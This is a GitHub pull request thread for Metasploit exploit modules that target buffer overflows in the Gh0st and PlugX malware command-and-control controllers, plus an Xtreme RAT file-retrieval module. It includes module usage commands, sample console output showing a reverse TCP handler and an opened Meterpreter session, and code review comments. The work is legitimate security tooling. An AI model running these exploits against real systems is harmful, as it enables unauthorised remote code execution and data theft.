New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Gh0st, plugx, Controller Buffer Overflow Modules #8788
Conversation
This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim. This vulnerability can allow remote code execution ## Verification Run the Gh0st C2 server on a target windows machine. The sample 0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c is a Gh0st 3.6 server that works good for testing. - [ ] use exploit/windows/misc/gh0st - [ ] set RHOST [ip of target] - [ ] exploit Sample output: ``` msf > use exploit/windows/misc/gh0st msf exploit(gh0st) > set rhost 192.168.161.128 rhost => 192.168.161.128 msf exploit(gh0st) > exploit [*] Started reverse TCP handler on 192.168.161.1:4444 [*] 192.168.161.128:80 - Trying target Gh0st Beta 3.6 [*] 192.168.161.128:80 - Spraying heap... [*] 192.168.161.128:80 - Trying command 103... [*] Sending stage (957487 bytes) to 192.168.161.128 [*] Meterpreter session 1 opened (192.168.161.1:4444 -> 192.168.161.128:49161) at 2017-07-29 10:11:4
This module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message. This vulnerability can allow remote code execution however it causes a popup message to be displayed on the target before execution is gained. ## Verification Run the PlugX C2 server on a target windows machine. The sample 9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6 is a Plux Type 1 server that works good for testing. - [ ] use exploit/windows/misc/plugx - [ ] set RHOST [ip of target] - [ ] set target 1 - [ ] exploit - [ ] acknowledge the "PeDecodePacket" message on the target Sample output: ``` msf> use exploit/windows/misc/plugx msf exploit(plugx) > set rhost 192.168.161.128 rhost => 192.168.161.128 msf exploit(plugx) > set target 1 target => 1 msf exploit(plugx) > check [*] 192.168.161.128:13579 - "\x03\xB0\x02\x00\x04\x00" [*] 192.168.161.128:13579 The target appears to be vulnerable. msf exploit(plugx) >
This module is a Xtreme Rat Server Remote File Download Exploit that allows for blind file retrieval from the target ## Verification Run the Xtreme Rat server on a target windows machine. - [ ] use exploit/windows/misc/xtreme - [ ] set RHOST [ip of target] - [ ] set TARGETFILE testfile.txt - [ ] exploit Sample output: ``` msf> use exploit/windows/misc/xtreme msf exploit(plugx) > set rhost 192.168.161.128 rhost => 192.168.161.128 msf exploit(plugx) > set target 1 TARGETFILE => testfile.txt [*] 192.168.161.128:80 - Trying target Xtreme RAT 3.7... ```
xtreme.rb
Outdated
print_status("Trying target #{target.name}...") | ||
|
||
connect | ||
sock.put("myversion|{target['Ver']}\r\n") |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Is this meant to be #{target['Ver']}
rather than {target['Ver']}
, like line 56 ?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Yes, I'm actually surprised it works without this. Updated
xtreme.rb
Outdated
register_options( | ||
[ | ||
Opt::RPORT(80), | ||
OptString.new('TARGETFILE', [false, 'Target file to download', 'user.info']) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
TARGETFILE
should probably be true
rather than false
as a target file is required.
xtreme.rb
Outdated
[ | ||
Opt::RPORT(80), | ||
OptString.new('TARGETFILE', [false, 'Target file to download', 'user.info']) | ||
], self.class |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
self.class
isn't required
register_options( | ||
[ | ||
Opt::RPORT(13579) | ||
], self.class |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
self.class
isn't required
[ | ||
OptString.new('MAGIC', [true, 'the 5 char magic used by the server', 'Gh0st']), | ||
Opt::RPORT(80) | ||
], self.class |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
self.class
isn't required
xtreme.rb
Outdated
end | ||
print_status("Received file #{datastore['TARGETFILE']}!") | ||
# print_status(fdata.inspect) | ||
store_loot('xtremeRat.file', 'text/plain', datastore['RHOST'], fdata, datastore['TARGETFILE'], 'File retrieved from Xtreme C2 server') |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
It might be nice to notify the user where the file was saved.
store_loot
returns the file path, so you can do something like:
path = store_loot(...)
print_good("File saved in: #{path}")
fixed typo in xtreme.rb when communicating with C&C removed self.class from options on all three modules added line to log path where loot has been stored in xtreme.rb
I've made the suggested improvements in my fork, thank you. |
removed duplicate file from wrong location
Do you have access to samples for all 3 of these? |
Yes, I do. Please see attached |
@bcoles do you wanna take this one? My schedule has freed up some, so I wouldn't mind doing these. |
All yours @h00die |
@Professor-plum what is the password for Xtreme Rat zip? I tried 'infected' as is the industry standard, but no luck. |
@Professor-plum i'll also note that typically you want to submit 1 module per pull request. So in this case you'd want to submit 3. It makes things go quicker and easier so if 1 module had an issue, the others could land while we fix up the other. In this case though since @bcoles already gave everything a once over, we'll just keep going. |
gh0st working for me against xp sp3:
|
I'm getting no luck on PlugX Type II. It shows "waiting for response", and the target pops up a box that says "OnSocketPacket". No shell. Then I get an access violation crash. Unfortunately since all 3 exploits are shoved in one PR, you didn't show an example run of this, and there are no docs included so I'm not sure if its operator error on my part or not. Please advise. |
Cleaned up the title and description of your request. You should also add docs to the pull request. There are many examples, but see https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/http/diskboss_get_bof.md . There is a template here: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md |
@Professor-plum waiting on the following:
Just want to check in to make sure you are still around and not ditching this |
Sorry, I meant to get to this today but time escaped me. I'm not sure what is wrong with the zip, infected should be the password. I'm attaching another copy, this time no password. The plugX sample isn't for the default target type so you'll need to I tried documenting each module on the commit comments for each, per the format requested. I'm attaching that documentation below for convenience. PlugXThis module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message. This vulnerability can allow remote code execution however it causes a popup message to be displayed on the target before execution is gained. VerificationRun the PlugX C2 server on a target windows machine. The sample 9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6 is a Plux Type 1 server that works good for testing.
Sample output:
Xtreme RATThis module is a Xtreme Rat Server Remote File Download Exploit that allows for blind file retrieval from the target VerificationRun the Xtreme Rat server on a target windows machine.
Sample output:
|
plugx working. I swear i tried changing the target, but who knows.
|
No go on Xtreme RAT (but it unzipped and ran).
The other issue is its a file downloader, if it doesn't give a shell it needs to be moved to the auxiliary folders. |
For future reference, you'll also want to use a different branch than master for your own fork. |
xtreme is going to need a slight re-write to be in aux. |
Modules cleanup and add docs
Release NotesThe Gh0st Client buffer Overflow module has been added to the framework. It targets the malware Gh0st controller, as well as PlugX controlle, to result in remote code execution. |
@Professor-plum congrats on landing your first 2 modules to the framework! Thank you for your contributions. Hopefully we'll see a new PR for the aux module with xtreme. If you have questions, you can always jump on IRC to ask for help! |
This PR contains 2 exploits for different malware controllers.
This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim. This vulnerability can allow remote code execution
Verification
Sample output for gh0st:
Historical Notes
This also originally included xtreme rat, which was removed for a rewrite into a diff PR.